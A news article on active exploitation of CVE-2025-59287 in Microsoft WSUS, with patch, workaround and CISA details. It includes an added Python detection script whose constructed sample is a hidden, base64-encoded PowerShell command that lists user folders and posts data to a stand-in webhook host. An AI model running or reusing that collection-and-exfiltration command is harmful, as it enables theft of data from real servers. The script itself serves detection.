Cybersecurity vendors are warning organizations about a critical vulnerability in Microsoft’s Windows Server Update Service (WSUS) and urging them to apply patches now that a proof-of-concept (POC) exploit is public and the flaw is being actively exploited in the wild.
The vulnerability – tracked as CVE-2025-59287, with a CVSS score of 9.8 out of 10 – gives threat actors remote code execution (RCE) on unpatched WSUS servers, which can let them gain control of enterprise networks and use them to deliver malware.
“WSUS is a foundational tool for IT administrators, enabling the centralized management and distribution of Microsoft product updates across corporate networks,” Palo Alto Networks’ Unit 42 threat intelligence group wrote in a report this week. “Its role as a trusted source for software patches makes it a high-value target; a compromise of a WSUS server can provide a foothold for lateral movement and widespread network compromise.”
Microsoft wrote that by exploiting the flaw, “a remote, unauthenticated attacker could send a crafted event that triggers unsafe object deserialization in a legacy serialization mechanism, resulting in remote code execution.”
The IT giant issued a patch for the security flaw October 10, but it didn’t completely fix the problem, and on October 23 it rolled out an out-of-band security update. Microsoft had also outlined two workarounds organizations could apply to mitigate the flaw: disabling the WSUS Server Role on the server if it had been enabled, or blocking inbound traffic to ports 8530 and 8531 on the host firewall.
However, Microsoft also urged security teams not to undo either workaround until they had applied the October 23 patch.
Security vendors like Hawktrace, which released POC exploit code on October 23, have been tracking the vulnerability for a couple of weeks and are now seeing it exploited by bad actors.
“Within hours of the emergency update, Unit 42 and other security researchers observed active exploitation in the wild,” the Unit 42 researchers wrote. “The combination of a remotely exploitable, unauthenticated RCE in a core infrastructure service, coupled with observed active exploitation in the wild, represents a severe and time-sensitive risk.”
In a report late last week, security researchers with Huntress described a similar trend, writing that on October 23 they had started seeing threat actors target WSUS instances that were publicly exposed on their default ports to exploit the vulnerability.
“Attackers leveraged exposed WSUS endpoints to send specially crafted requests (multiple POST calls to WSUS web services) that triggered a deserialization RCE against the update service,” they wrote. “Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary: (process chains observed).”
A base64-encoded payload was decoded and executed in PowerShell; it searched the servers for sensitive network and user information and sent what it found to a remote webhook. Proxy networks were used to conduct and obfuscate the exploitation, the researchers added.
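Detection logic for the process chains Huntress describes, as an added example that is not from the article or from any of the vendors quoted: it flags process-creation records in which the IIS worker process (w3wp.exe) or the WSUS service binary (assumed here to be WsusService.exe) spawns a shell, and decodes any base64 -EncodedCommand PowerShell so the payload's collection targets and webhook can be read. The event records and the encoded script are constructed.

```python
import base64
import re

# Parents on a WSUS host that have no business spawning a shell: the IIS worker
# process behind the WSUS web services and the WSUS service itself (assumed names).
SUSPECT_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell's -EncodedCommand and its abbreviations, followed by a base64 token.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed sample: a collection script wrapped the way -enc expects (UTF-16LE, base64).
PAYLOAD_SCRIPT = "Get-ChildItem C:\\Users; Invoke-RestMethod -Uri https://webhook.example/collect"
ENCODED = base64.b64encode(PAYLOAD_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"id": 2, "parent": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

def decode_encoded_powershell(cmdline):
    """Return the script hidden in an -EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(event):
    """Findings for one process-creation record; an empty list means nothing suspicious."""
    findings = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if parent in SUSPECT_PARENTS and image in SHELLS:
        findings.append(f"{parent} spawned {image}")
    decoded = decode_encoded_powershell(event["cmdline"])
    if decoded is not None:
        findings.append("encoded PowerShell: " + decoded)
    return findings

def triage(events):
    """Map event id -> findings, keeping only events that produced at least one."""
    report = {}
    for event in events:
        findings = triage_event(event)
        if findings:
            report[event["id"]] = findings
    return report
```

Events 1 and 2 are reported (the second with the decoded script showing the webhook), while the interactive shell under explorer.exe in event 3 is left alone.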
Dutch security company Eye Security wrote that its researchers also saw the WSUS flaw being exploited “world-wide, including our customer base.”
“Our telemetry shows scanning and exploitation attempts from 207.180.254[.]242, and our scans reveal roughly 2,500 WSUS servers still exposed world-wide, including about 100 in the Netherlands and 250 in Germany,” they wrote on LinkedIn. “This vulnerability is now being actively targeted, and we identified compromise attempts in our customer base we successfully blocked.”
CISA on October 24 also added CVE-2025-59287 to its catalog of known exploited flaws and said that federal civilian agencies must patch their systems within three weeks. The agency is also urging all organizations to apply the Microsoft patches “or risk an unauthenticated actor achieving remote code execution with system privileges.”